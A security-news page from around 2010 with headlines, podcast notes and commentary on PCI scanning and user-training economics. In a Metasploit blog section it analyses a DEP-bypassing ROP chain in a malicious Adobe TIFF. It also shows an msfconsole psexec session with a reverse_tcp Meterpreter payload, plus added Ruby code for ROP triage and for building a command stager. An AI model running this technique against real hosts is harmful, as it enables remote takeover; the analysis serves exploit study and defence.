Security News
W3AF ported to FreeBSD
Sofian Brabez, our FreeBSD expert, has updated the FreeBSD port of w3af to the 1.0-rc2 version and committed it to the FreeBSD ports tree. If you're using FreeBSD, you now have one more reason to use w3af and make your life easier when (...) - Security Tools / Penetration testing & Ethical Hacking, Application Scanner, w3af Tools Tracker Team
Exploit code over a DNS tunnel
Texas: 100 cars shut down by radio
The Latest Adobe Exploit and Session Upgrading
The TIFF contents seemed rather blob-ish, which was suspicious to me. A bit of digging on the vulnerability revealed it was a stack-based buffer overflow which was eerily similar to CVE-2006-3547. I figured there must be something in the TIFF contents that was disabling DEP in some way. The first thing I tried was to turn the blob into an array of 32-bit little endian integers. This was pretty easily accomplished as you can see in an excerpt here:
irb> blob.unpack("V*").each { |dw| puts "0x%x" % dw }
...
0x70072f7
0x10104
0x70015bb
0x1000
...
On a gut feeling, I changed the payload to begin with a breakpoint and checked 0x70072f7 to see if it was mapped. Indeed it was, and it pointed to a "pop eax / ret" instruction sequence. Then I proceeded to put a breakpoint at 0x70072f7 to see how things progressed from there. What I found was that several function tails were being used to create a hunk of memory that was not protected by DEP. After this was created, a bit more ROP (return oriented programming) was used to accomplish a "memcpy" of a small loader stub to this memory and execute it.
You might be asking yourself, "Great, but why do we care?" ... Well, AFAIK (feel free to comment), this is the first public exploit that uses multiple tail chunks to completely bypass permanent DEP. It certainly gives me a bit of a chill to see this coming from a maliciously circulating document...
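As an added example (not code from the post or from Metasploit), here is the unpack("V*") trick above extended into a small triage pass: which dwords of a suspicious blob fall inside a loaded module, and so could be return addresses in a ROP chain, and do they alternate with the small constants a chain feeds to "pop reg / ret" gadgets. The module name and address range, and both sample blobs, are constructed assumptions chosen so that the two addresses quoted above land inside the module.

```ruby
# Added example, not code from the original post or from Metasploit.
# Triage a blob for candidate ROP gadget addresses: dwords that point
# into a known module, and the gadget/argument alternation of a chain.

# Assumed module layout: hypothetical name and range, chosen so that the
# two addresses quoted in the post land inside it.
MODULE_RANGES = {
  "hypothetical_reader.dll" => (0x07000000..0x0707ffff),
}.freeze

# Constructed blob mimicking the excerpt above: gadget, argument, gadget, argument.
SAMPLE_BLOB = [0x070072f7, 0x00010104, 0x070015bb, 0x00001000].pack("V*").freeze

# Constructed control: plain ASCII padding, no module addresses.
PADDING_BLOB = ("A" * 16).freeze

# Decode a blob as 32-bit little-endian unsigned integers ("V*" in pack notation).
def unpack_dwords(blob)
  blob.unpack("V*")
end

# Label every dword with its file offset and, if it lies inside a known
# module, that module's name.
def classify_dwords(blob, ranges = MODULE_RANGES)
  unpack_dwords(blob).each_with_index.map do |dw, idx|
    owner = ranges.find { |_name, range| range.cover?(dw) }
    { offset: idx * 4, value: dw, module: owner && owner[0] }
  end
end

# Only the dwords that point into a module: the candidates worth checking
# in a debugger (as the post did for 0x70072f7).
def candidate_gadgets(blob, ranges = MODULE_RANGES)
  classify_dwords(blob, ranges).select { |e| e[:module] }
end

# Heuristic: the blob "looks like a ROP chain" if at least +min_ratio+ of
# its dwords land in modules and no two module hits are adjacent (the
# pop/ret gadget + argument pattern). It is a triage hint, not proof; a
# chain built only from ret-terminated gadgets would not alternate this way.
def looks_like_rop_chain?(blob, ranges = MODULE_RANGES, min_ratio: 0.5)
  entries = classify_dwords(blob, ranges)
  return false if entries.length < 2
  hits = entries.count { |e| e[:module] }
  return false if hits.to_f / entries.length < min_ratio
  entries.each_cons(2).all? { |a, b| !(a[:module] && b[:module]) }
end

# Human-readable dump in the style of the irb excerpt, with module annotations.
def dump_dwords(blob, ranges = MODULE_RANGES)
  classify_dwords(blob, ranges).map do |e|
    line = format("%08x: 0x%x", e[:offset], e[:value])
    e[:module] ? "#{line}  <- #{e[:module]}" : line
  end
end

if __FILE__ == $PROGRAM_NAME
  puts dump_dwords(SAMPLE_BLOB)
  puts "ROP-like: #{looks_like_rop_chain?(SAMPLE_BLOB)}"
end
```

On a real sample you would load the module ranges from the debugger (or from the PE headers of the modules the reader loads) rather than hard-coding them; the point of the ratio and alternation checks is to separate a chain from random data that happens to contain one plausible pointer.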
Upgrading Command Shell Sessions
For part two of this post, I wanted to highlight a little feature I added recently in response to a rather old ticket (#394). As of Revision 8088, it is now possible to turn existing Windows Command Shell sessions into full-blown Meterpreter sessions. This is all made possible by several recent advances in the framework, a large part of which was the CmdStager contributed by bannedit. You can see this functionality in action here:
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set
...
LHOST 10.13.37.2
LPORT 1337
PAYLOAD windows/meterpreter/reverse_tcp
RHOST 10.13.37.102
msf exploit(psexec) > exploit -z
...
[*] Command shell session 1 opened (10.13.37.2:1337 -> 10.13.37.102:1057)
...
[*] Session 1 created in the background.
msf exploit(psexec) > sessions -l
...
1 shell Microsoft Windows 2000 [Version 5.00.2195] 10.13.37.2:1337 -> 10.13.37.102:1057
...
msf exploit(psexec) > sessions -u 1
[*] Started reverse handler on 10.13.37.2:1337
[*] Starting the payload handler...
[*] Command Stager progress - 3.16% done (1694/53587 bytes)
[*] Command Stager progress - 6.32% done (3388/53587 bytes)
[*] Command Stager progress - 9.48% done (5082/53587 bytes)
[*] Command Stager progress - 12.64% done (6776/53587 bytes)
[*] Command Stager progress - 15.81% done (8470/53587 bytes)
[*] Command Stager progress - 18.97% done (10164/53587 bytes)
[*] Command Stager progress - 22.13% done (11858/53587 bytes)
[*] Command Stager progress - 25.29% done (13552/53587 bytes)
[*] Command Stager progress - 28.45% done (15246/53587 bytes)
[*] Command Stager progress - 31.61% done (16940/53587 bytes)
[*] Command Stager progress - 34.77% done (18634/53587 bytes)
[*] Command Stager progress - 37.93% done (20328/53587 bytes)
[*] Command Stager progress - 41.10% done (22022/53587 bytes)
[*] Command Stager progress - 44.26% done (23716/53587 bytes)
[*] Command Stager progress - 47.42% done (25410/53587 bytes)
[*] Command Stager progress - 50.58% done (27104/53587 bytes)
[*] Command Stager progress - 53.74% done (28798/53587 bytes)
[*] Command Stager progress - 56.90% done (30492/53587 bytes)
[*] Command Stager progress - 60.06% done (32186/53587 bytes)
[*] Command Stager progress - 63.22% done (33880/53587 bytes)
[*] Command Stager progress - 66.39% done (35574/53587 bytes)
[*] Command Stager progress - 69.55% done (37268/53587 bytes)
[*] Command Stager progress - 72.71% done (38962/53587 bytes)
[*] Command Stager progress - 75.87% done (40656/53587 bytes)
[*] Command Stager progress - 79.03% done (42350/53587 bytes)
[*] Command Stager progress - 82.19% done (44044/53587 bytes)
[*] Command Stager progress - 85.35% done (45738/53587 bytes)
[*] Command Stager progress - 88.51% done (47432/53587 bytes)
[*] Command Stager progress - 91.68% done (49126/53587 bytes)
[*] Command Stager progress - 94.84% done (50820/53587 bytes)
[*] Command Stager progress - 97.99% done (52510/53587 bytes)
[*] Sending stage (748032 bytes)
msf exploit(psexec) > [*] Meterpreter session 2 opened (10.13.37.2:1337 -> 10.13.37.102:1058)
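The progress lines above come from the command stager pushing 53587 bytes through the existing shell in fixed-size pieces. As an added example, not Metasploit's CmdStager and not code from the post, the block below shows the idea behind it: a shell session can only run commands, so the binary is encoded, split into chunks that fit on one command line, rebuilt on the target by appending to a file, and progress is reported per chunk. The target-side command ("echo <hex> >> file"), the command-line limit and the sample payload are assumptions; a real stager uses whatever the remote shell can decode.

```ruby
# Added example, not Metasploit's CmdStager and not code from the post.
# Minimal command stager: hex-encode a payload, split it into echo
# commands that fit one command line, report progress per chunk, and
# simulate the target rebuilding the file so the round trip can be checked.

MAX_CMD_LEN = 4096 # assumption: upper bound for one command line

# Hex-encode +payload+ and split it into "echo" commands no longer than
# +max_len+; the first command truncates +dest+, later ones append to it.
def build_stager_commands(payload, dest = "stage.hex", max_len = MAX_CMD_LEN)
  hex = payload.unpack("H*").first
  overhead = "echo ".length + " >> ".length + dest.length
  chunk_hex = max_len - overhead
  chunk_hex -= 1 if chunk_hex.odd?          # keep chunks on byte boundaries
  raise ArgumentError, "max_len #{max_len} too small" if chunk_hex < 2
  hex.scan(/.{1,#{chunk_hex}}/).each_with_index.map do |chunk, idx|
    "echo #{chunk} #{idx.zero? ? '>' : '>>'} #{dest}"
  end
end

# Progress strings after each command, in the transcript's format.
def stager_progress(commands)
  total = commands.inject(0) { |sum, c| sum + c.length }
  sent = 0
  commands.map do |cmd|
    sent += cmd.length
    format("Command Stager progress - %.2f%% done (%d/%d bytes)",
           100.0 * sent / total, sent, total)
  end
end

# Simulate the target: apply the commands to in-memory "files" and decode
# the result, so the round trip can be checked without a real host.
def simulate_target(commands)
  files = {}
  commands.each do |cmd|
    m = cmd.match(/\Aecho (\h+) (>>?) (\S+)\z/) or raise "unexpected command: #{cmd}"
    data, op, file = m.captures
    files[file] = "" if op == ">" || !files.key?(file)
    files[file] = files[file] + data
  end
  files.each_with_object({}) { |(file, hex), out| out[file] = [hex].pack("H*") }
end

# Constructed sample payload: 1 KiB covering every byte value.
SAMPLE_PAYLOAD = ((0..255).to_a.pack("C*") * 4).freeze

if __FILE__ == $PROGRAM_NAME
  cmds = build_stager_commands(SAMPLE_PAYLOAD, "stage.hex", 200)
  stager_progress(cmds).each { |line| puts "[*] #{line}" }
  puts "round trip ok: #{simulate_target(cmds)['stage.hex'] == SAMPLE_PAYLOAD}"
end
```

The byte counts in the progress lines are command bytes, not payload bytes, which is why the total exceeds the size of the executable being staged; the same is true of the transcript above, where 53587 bytes of commands carry a much smaller stager binary.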
Competition for the Council of Europe's Cybercrime Convention
Ex-car dealer disables cars by remote control
First details on Service Pack 1 for Windows 7 and Server 2008 R2
Pwn2Own predictions: iPhone will be hacked
Security updates for Drupal modules
Mac OS X: "lower risk, but ultimately less secure"
PCI-SSC slaps ASVs wrists over marketing claims about 11.2 & 6.6
ASV: I'm a lawyer so let me be your heart surgeon
Several ASVs have received notices recently surrounding the marketing of services they sell related to being qualified by the Council. While the PCI SSC does qualify each and every ASV to conduct external vulnerability scans to meet the external scan validation requirement for PCI DSS 11.2, it does not give any ASV license to sell their services for other security practices as an agent of the PCI Council.
Here are two examples that are unacceptable and violate the ASV's contract:
1. "As an ASV, our company has been certified by the PCI Council for you to achieve both Requirement 11.2 for vulnerability scanning and Requirement 6.6 for application scanning."
There are two issues with the above statement. First, and this is a common mistake, ASVs do not help merchants fully achieve DSS Requirement 11.2. The requirement calls for both internal vulnerability scanning and external vulnerability scanning, and the Council only qualifies ASVs to perform the external half. Although an ASV can separately offer internal vulnerability scanning services, internal vulnerability scanning is a) not required to be done by an ASV and b) not part of the ASV qualification process. We clarified this with a note in the 1.2 release of the PCI DSS, and further clarity may come in October 2010. The second, and more egregious, issue is the use of a conjunction (YouTube "School House Rock" if you need a refresher on the function of a conjunction) to bundle in another service completely unrelated to anything the PCI Council has validated. There is no program to validate those who review adherence to Requirement 6.6, and the ASV lab testing is not an exhaustive process that endorses any solution as an annual evaluation of web application security.
The new disclosure debate and the evil Mr Moore
PDC Smackdown! Ron "Scanman" Gula vs. Rich "The General" Bejtlich
Please join us tomorrow night at 7:30 PM for DebateMania CXCI: "Controls vs. Threat-based Approaches to Information Security Monitoring".
We'll have Richard "Bonecrusher" Bejtlich, Director of Incident Response at GE, and Ron "Tenacious" Gula, CEO of Tenable Network Security, debate the pros and cons of having a strong IT controls program vs. one focused on responding to threats. Ron will fearlessly defend the practice of a controls program while Rich will bring bone crushing rebuttals for a threat-centric monitoring program.
NOTE: Picture is not an actual representation of past debates.
The live stream should be active around 19:30 EDT (7:30 PM), Thursday, March 18th. Please keep in mind that the recording time is as slippery as a lubed up Andre The Giant.
Please join the IRC channel during the stream - we can take live comments and discussion from the channel! Find us on IRC at irc.freenode.net #pauldotcom.
When active, the live stream(s) can be found at:
PaulDotCom Live! - You can watch, listen, and chat during each episode! You can access the streaming videos at any time by visiting http://pauldotcom.com/live/
PaulDotCom Icecast Radio (Audio Only)
Break out your adult beverage of choice and join us, enjoy the show live, and thanks for listening!
- Paul, Larry, Carlos, Darren, John & Mick
Effectiveness of User Training… and Security Products in General
It’s not every day I come across real wisdom in research but I saw a link yesterday to So Long, And No Thanks for the Externalities: The Rational Rejection of Security Advice by Users which is a research paper written by one of the guys at Microsoft. There are some amazingly choice quotes in there, like:
as far as we can determine, there is no evidence of a single user being saved from harm by a certificate error, anywhere, ever. Thus, to a good approximation, 100% of certificate errors are false positives.
Priceless… Mozilla - take a word of advice from the MS guys and make your invalid SSL cert flow 1000% less annoying please. Anyway, another one of the quotes I thought was even more interesting:
If phishing victimizes 0.37% of users per year and each victim wastes 10 hours sorting it out, to be beneficial the daily effort of following the advice should be less than 0.0037 x 0.5 x 10 / 365 hours, or 0.18 seconds per day.
So… if .18 seconds per day is too much, let’s take a look at what our anti-phishing technologies are doing. Let’s say they take up 2 whole seconds a day to download their lists, and verify that the sites you browse aren’t on that list, while you are surfing and trying to boot up and shut down browser processes, etc…. We are talking about a more than 10x delta between what it should actually take. Further, let’s do the math on what would happen if anti-phishing went away. How many times worse would the phishing black market be if anti-phishing filters went away entirely and phishing was instead dealt with by the registrars, ISPs and the brand owners themselves? Three times? Five times? Would it go to ten times? Would it go to more than ten times to make it actually worthwhile from an economic perspective?
How about UAC in Windows? How many seconds has that added to everyone’s day to stop the threat of malware? Does it add up and does it actually stop malware infections for the additional time it incurs? What about Anti-virus? Are we operating in a deficit or do those security products actually prove themselves to be worthwhile for the entire public? I know this is really tricky math based on an insane amount of variables, and it might very well prove out that some products are a no-brainer because they don’t add time or latency. But I do suspect there are a lot of things that we tend to think of as good ideas that actually end up being worse for the end user if you do the math. I know the article was really talking about user education being a bad idea economically (and I couldn’t agree more based on every study I’ve seen or been a part of). But it’s still interesting to think about how a similar formula could be applied elsewhere. Thought provoking research anyway.
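Added note, not part of the post: the quoted break-even formula can be inverted to put a number on the anti-phishing question above. The 0.5 factor is carried over from the quoted formula as the share of the harm the measure is assumed to avert; the 2 seconds per day is the post's own assumption.

A measure costing c seconds per user per day breaks even when its yearly cost equals the expected harm it averts:

    c / 3600 x 365 = p x 0.5 x 10      (hours per user per year)

so the victimization rate p* that just justifies it is

    p* = c x 365 / (3600 x 0.5 x 10) = c / 49.3

Check against the quote: c = 0.18 s gives p* = 0.18 / 49.3 = 0.0037, the paper's 0.37%.

For the 2 seconds per day the post assumes for anti-phishing filters: p* = 2 / 49.3 = 0.041, i.e. about 4.1% of users per year would have to be victimized (assuming the filter still only halves the harm) for the filter to pay for itself. That is about 11 times the observed 0.37%, which is the "more than 10x" gap the post refers to, and it is the multiplier the "how many times worse" question is really asking about: the black market would have to grow roughly elevenfold, at an unchanged 10 hours per victim, before a 2-second-per-day filter breaks even on this model.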
Dispute over virtual security holes
Security hole in SpamAssassin filter module
Tenable Network Security Podcast - Episode 26
Welcome to the Tenable Network Security Podcast - Episode 26
Announcements
- Two new blog posts have been released, titled "The Value Of Credentialed Vulnerability Scanning" and "Microsoft Patch Tuesday - March 2010 - 'It Won't Happen To Me' Edition".
- You can provide feedback to this podcast and all of our social media outlets by visiting our discussions forum and adding messages to the "Tenable Social Media" thread. I would love to hear your feedback, questions, comments and suggestions! I put up a call for ideas on new Nessus videos, so please give us your feedback!
- We're hiring! - Visit the web site for more information about open positions, there are currently 7 open positions listed!
- You can subscribe to the Tenable Network Security Podcast on iTunes!
- Tenable Tweets - You can find us on Twitter at http://twitter.com/tenablesecurity where we make various announcements, Nessus plugin statistics and more!
Interview - Ron Gula - CCDC Recap
Ron Gula and I discuss our experiences at the 2010 Collegiate Cyber Defense Exercise held this past weekend in Columbia, MD.
Stories
- Six Steps To "Cloud" Security - Nothing New - A researcher published a paper in the International Journal of Services and Standards titled "A 'cloud-free' security model for cloud computing". In it she outlines six security considerations for cloud computing, which to me represent nothing really new. The first, resource sharing on "cloud" providers could lead to your data being accessed. This is similar to VLANs on switches, which are essentially software, which means you need to carefully design your network to be certain your most critical assets are not on the same switch as something less critical. This is a risk decision, and should be constantly evaluated, whether you are using a "cloud" provider or designing VLANs on a switch. Second, she points out that since data is held off-site, ownership may have become compromised. This is another issue which I have dealt with when I worked for an ISP/hosting provider. Physically being separate from your data means that you need to make yet even more risk-based decisions. If the data you are hosting off-site is public anyway, then there is little need for concern. However, if the data is sensitive or confidential, you may want to take extra precautions to safeguard it at remote sites (encryption, physical security, etc...). How is this different than using a remote storage facility for your backup tapes? There are more, and my advice is to look at the "cloud" security information and relate it to similar security and risk decisions in your organization and I believe you will find that you are well equipped to handle securing your organization, whether it's cloudy or sunny.
- Security Policy Gone Wrong - This story centers around the following quote from a client: "Ok, how about this: We take an image of your hard drive when you enter the building. When you leave in the evening, we take another image and see what data changed. This way, we know if any sensitive data leaves the company." I like coming up with creative solutions, but this one just doesn't stick!
- Network Analysis Of A Logitech Mouse Server - While this may not sound particularly concerning, the protocol that allows you to control the keyboard and mouse of a system running this software does not authenticate the commands. This means a packet crafting tool, such as scapy, can be used to send keystrokes to the device. Most users find this type of technology convenient, but fail to realize the security risks. In your environment you have to control the installation of this type of software.
(Note: Please ignore the opening when I incorrectly refer to this as episode 25, whoops!)